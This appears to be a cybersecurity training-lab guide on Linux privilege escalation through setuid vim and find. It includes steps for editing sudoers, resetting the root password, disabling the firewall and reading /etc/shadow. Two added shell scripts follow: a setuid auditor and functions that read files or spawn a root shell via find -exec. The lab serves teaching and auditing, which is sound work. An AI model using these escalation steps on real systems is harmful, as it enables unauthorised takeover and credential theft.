Privilege escalation on Linux means raising the level of authority you hold on the system, by switching from one user account to another or otherwise obtaining privileges you were not granted. For example, a regular user can become root, or gain the same permissions as root, by running commands with root's effective user ID. This can be legitimate, sanctioned usage, as with the su and sudo commands; it becomes an attack when a misconfiguration lets an unprivileged user do the same thing without authorization.
In this hands-on lab, learners escalate privileges on a Linux server. First, they deliberately configure the Vim text editor so that it runs with root privileges, and then test how that configuration can be exploited. Next, they use the elevated privileges to reset the root password, restart a service, disable the firewall, and read password hashes. Finally, they grant the same kind of privilege to the find command and exploit it to run commands as root and, again, read the password hashes.
Understand the Scenario
In this virtual lab, you are responsible for ensuring that server configurations for your organization are secure. You believe one of the servers has been configured in a way that grants administrative privileges to programs that could be exploited. To accomplish this task, you will use a default installation of CentOS 7 Linux with the Server with GUI package installed. Non-privileged accounts have been created for you. You will be guided through the process of adding software if necessary.
Create a security vulnerability by granting administrative privileges to Vim
In this section of the virtual lab, learners deliberately configure the Vim text editor so that it runs with root privileges, the setuid-root misconfiguration they will exploit later. To accomplish this task, learners will:
- Open a terminal as the non-privileged user01 account and run the find command to list programs that execute with administrative privileges (files owned by root with the setuid bit set), then run the cat command to attempt to view the shadow file, /etc/shadow.
- The shadow file stores the hashed user account passwords (the hashes are often loosely called "encrypted passwords"). By default only root can read it, so the cat command fails with a "Permission denied" error because you are signed in to an account without administrative privileges.
- Run the su command to switch to the root user account and, when prompted, enter the root password. As root, run the chmod command that sets the setuid bit on the Vim binary (chmod u+s on the vim executable), so that Vim runs with root's effective user ID regardless of who starts it. Then enter exit to return to the user01 account.
- Run the find command again to list programs that run with administrative privileges, and confirm that Vim now appears in the results.
Finally, learners check and confirm what they have done: they have searched for programs that run with administrative privileges, and they have granted root privileges to any user who runs the Vim text editor.
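The audit side of the find step above, as an added example that is not part of the lab's own materials: it lists setuid binaries the way find -perm -4000 does, flags the ones that can hand out a root shell or arbitrary file access, and shows the chmod that creates and reverses the lab's misconfiguration. The list of shell-escape binaries is an assumption (vim and find are the lab's two; the rest are common equivalents), and build_scratch_tree constructs a dummy stand-in for the lab VM so the script can be exercised without root. On a real system, point list_setuid and flag_shell_escapes at /.

```shell
#!/bin/sh
# Added example (not part of the lab): the defender's version of the lab's
# find step. Lists setuid binaries, flags the dangerous ones, and shows the
# chmod that grants and revokes the setuid bit.

# Names of binaries that yield a shell or arbitrary read/write when setuid
# root. vim and find are the two the lab deliberately misconfigures; the
# rest are an assumed, non-exhaustive list of common equivalents.
SHELL_ESCAPE_BINS="vim vi view find less more nano awk perl python bash sh"

# Regular files under $1 (default /) with the setuid bit set, one per line.
# -perm -4000 matches any mode that includes setuid; -xdev stays on one
# filesystem; errors from unreadable directories are discarded.
list_setuid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Subset of list_setuid whose basename is on SHELL_ESCAPE_BINS.
flag_shell_escapes() {
    list_setuid "$1" | while IFS= read -r path; do
        name=$(basename "$path")
        for bin in $SHELL_ESCAPE_BINS; do
            if [ "$name" = "$bin" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# The lab's deliberate misconfiguration (as root on the VM:
# chmod u+s /usr/bin/vim) and its reversal. Only the setuid bit changes.
grant_setuid()  { chmod u+s "$1"; }
revoke_setuid() { chmod u-s "$1"; }

# Constructed stand-in for the VM: a scratch tree with dummy executables
# named like real binaries. $1 is the tree root. Prints nothing.
build_scratch_tree() {
    mkdir -p "$1/usr/bin"
    for f in vim find passwd cat; do
        printf '#!/bin/sh\nexit 0\n' > "$1/usr/bin/$f"
        chmod 755 "$1/usr/bin/$f"
    done
    # passwd is legitimately setuid on a real system; vim and find are the
    # lab's mistakes; cat stays unprivileged.
    grant_setuid "$1/usr/bin/passwd"
    grant_setuid "$1/usr/bin/vim"
    grant_setuid "$1/usr/bin/find"
}

# Number of flagged binaries under $1, for scripted before/after checks.
count_flagged() {
    flag_shell_escapes "$1" | wc -l | tr -d ' '
}
```

Source the script and run list_setuid / before the lab, again after the chmod, and diff the two listings; a new entry for vim (or find) is exactly the change an attacker would make, and count_flagged gives a single number to alert on.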
Exploit the root privilege granted to Vim
Privilege escalation is usually one stage of a larger attack: once an attacker has a foothold as an unprivileged user, gaining root lets them deploy a malicious payload, read any file, or take full control of the system. In this section of the lab, learners exploit the root privilege granted to Vim. First, run the vim command to open the sudoers file, /etc/sudoers, in the Vim text editor; because Vim is now setuid root, the editor can read and write that file even though user01 cannot. This file controls the delegation of administrative privileges through sudo. The entry you add (of the form user01 ALL=(ALL) ALL) delegates the right to run all commands on the system as if you were the system administrator (root). Move to the end of the file, enter Insert mode, add the entry, then force Vim to save the changes (sudoers is read-only, so a plain write is refused) and exit Vim. In this way you delegate full system administrator privileges to the user01 account, exploiting the vulnerability created in the first section when Vim was configured to run with the system administrator's privileges. Finally, confirm that user01 now has full sudo rights. A caveat worth knowing: a syntax error in sudoers breaks sudo for every account, which is why administrators edit it only through visudo, which validates the file before saving.
Use elevated privileges to take control of a server
Privilege escalation is a class of intrusion that abuses programming errors, design flaws, or misconfigurations to give the attacker a higher level of access than intended. In this section of the virtual lab, learners use the elevated privileges to take control of the server. First, run sudo with the passwd command to reset the root password, and enter the new password when prompted; this locks the legitimate system administrator out of the server. Next, run sudo systemctl restart sshd to restart the SSH service, then run sudo systemctl stop firewalld and sudo systemctl disable firewalld to stop the firewall and keep it from starting at boot. Next, run sudo cat /etc/shadow to view the hashed passwords stored in the shadow file; these hashes can be copied into a password-cracking program such as John the Ripper. Finally, use Vim's shell-escape command (:shell) from the root-privileged editor to open a command prompt that has root privileges.
Create a security vulnerability by configuring the find command
In this section of the virtual lab, you create a second security vulnerability by configuring the find command in the same way. First run su to switch to root, then run the chmod command that sets the setuid bit on the find binary so that find runs with administrative privileges. This creates a vulnerability because find can run another command on each file it matches, through its -exec option, and with find setuid root that command runs as root. Finally, run find with -exec to read the hashed passwords from /etc/shadow, which user01 could not read directly.
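The -exec primitive described above, as an added example that is not part of the lab's own materials. find executes its -exec command with find's own effective UID, so on the lab VM a setuid-root find turns "find /etc/shadow -exec cat {} \;" into a root file read and "find . -prune -exec /bin/sh -p \;" into a root shell. The functions below run those same commands; against the constructed file used in the self-test they run as the caller, on the lab VM they run as root. euid_via_find is the check a practitioner runs first to confirm the misconfiguration is actually exploitable.

```shell
#!/bin/sh
# Added example (not part of the lab): what a setuid-root find gives an
# attacker, and how to verify it. Nothing here requires root; the commands
# simply inherit whatever effective UID find has.

# Run any command on a single path via find's -exec. -prune stops find from
# descending if the path is a directory, so the command runs exactly once.
# Usage: run_via_find /etc/shadow cat
run_via_find() {
    target=$1
    shift
    find "$target" -prune -exec "$@" {} \;
}

# Read a file through find instead of directly: the lab's final step,
# "find /etc/shadow -exec cat {} \;", generalised to any path.
read_via_find() {
    run_via_find "$1" cat
}

# Effective UID that -exec children run with. id -u prints the effective
# UID, so this returns 0 under a setuid-root find and the caller's own UID
# otherwise, for example when find is not setuid or sits on a nosuid mount.
euid_via_find() {
    find . -prune -exec id -u \;
}

# Interactive root shell via find. On CentOS 7 /bin/sh is bash, and bash
# resets its effective UID to the real UID unless started with -p, so the
# -p is what keeps root privilege in the spawned shell.
root_shell_via_find() {
    find . -prune -exec /bin/sh -p \;
}
```

Run euid_via_find as user01 after the chmod: if it prints 0 the server is compromised; if it prints user01's UID the setuid bit is being ignored and the escalation fails, which is the effect you want from the fix (chmod u-s on find) or from a nosuid mount.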
Lab Summary and Conclusion
After completing the "New Escalate Privileges in Linux" virtual lab, you will have accomplished the following:
- Granted administrative privileges to the Vim text editor.
- Exploited the administrative privileges of Vim by elevating your privileges to that of the root user.
- Used elevated privileges to reconfigure the server by resetting the password of the root user, restarting a service, disabling the firewall, and accessing password hashes.
- Granted administrative privileges to the find command.
- Exploited the administrative privileges of the find command by running commands as the root user, and then accessing password hashes.